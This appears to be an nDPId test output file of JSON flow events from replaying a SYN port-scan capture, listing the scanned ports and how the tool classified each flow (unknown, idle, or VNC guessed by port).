+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1091,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20221,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20221,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":848,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7937,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":848,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7937,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7938,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7938,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":899,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7937,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":899,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7937,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7938,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7938,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1841,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1841,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1920,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1801,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1920,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":885,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34571,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":885,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3851,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3851,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":970,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34571,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":970,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34572,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34572,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3851,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3851,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5900,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1046,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34573,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1046,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34573,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34572,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34572,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":838,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5901,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":838,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1805,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1805,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5900,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VNC","breed":"Acceptable","category":"RemoteAccess"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34573,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 